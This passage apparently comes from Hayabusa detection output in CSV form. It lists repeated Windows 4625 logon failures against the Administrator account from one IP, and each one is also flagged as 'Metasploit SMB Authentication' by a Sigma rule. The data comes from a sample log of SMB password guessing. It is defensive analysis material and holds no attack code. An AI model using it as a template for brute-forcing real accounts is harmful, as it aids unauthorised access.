NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.952 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NGWVqbchMitnLVYT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.047 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.086 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y7K9vifU9lWwpP9J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.086 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oIgKYj210JfICJXv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.142 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jisuKilPQivTV8yE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hckyoom0XnqpRzK8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.229 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: De0l6qgcuhMERjMY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.284 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.343 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: SSa7pylPWn8jl2Ox : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.343 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ol9OntO4hqidlNUi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.377 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kXOBF0ZWLxMauHuT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.431 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WVBFJltkR5vnmpYD : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.504 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.554 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kHVXEHq9zNYdfTpZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.554 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OIw3BxmLsfwDXXFg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.647 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hhgRhjnhkRJus4fw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.647 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xz78guWXrekEvuFT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 04wNT26RJmriQrfH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.742 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XmbuuymdSpfNldt2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.792 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: yqJarBVOImq5Tn2p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.837 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BZYExQroYH65tPuG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.876 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: llU5DQBrIrV3VtG5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.913 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HV17iXOYQqs2ntax : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.953 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.994 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esZnEeyGdPa22PsL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.994 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rlYFTP9a2wdi5A2n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oJifU0PnO1Ntp6z3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.075 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xGKdKjJy28Qd1whT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x3L4BYjYJYlvuYHE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.166 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.206 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ui5RoLKttDo0wfFJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.206 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: G2xjdWobsxBjo6p7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TPeQ0M5lXITI84G3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.293 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uu72qx4lG5ZRM7xf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.337 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zD072YR1hIgbzjaT : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.392 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EqA7HDvImIlCiFq2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.449 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: efYFxZwMGEC3vVi7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.508 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6WmMHYegvFJvv6zd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.552 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DS9WkRnP0B5MgaeX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.601 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y5jNPV7ZgFExgg9n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.656 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V1FJ6vm3wK97iual : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.707 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: GLuIx0sfF8NQD8QY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.753 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.800 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y3lMvcrrmGTkjdlh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.800 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.854 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ZqOabcNMeazs6TC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.854 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j2AbE9D8PvuFDBz5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wzWdLEEc68ZvviGh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.966 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.030 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AtV3BuZiljbAeikO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.030 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tnKKfcwikNDdYOam : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jSbbzD7fpJY4Q1JL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.125 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gOASpLLE25ruCnGW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.175 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1jhUGOtszbPUwccL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.271 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
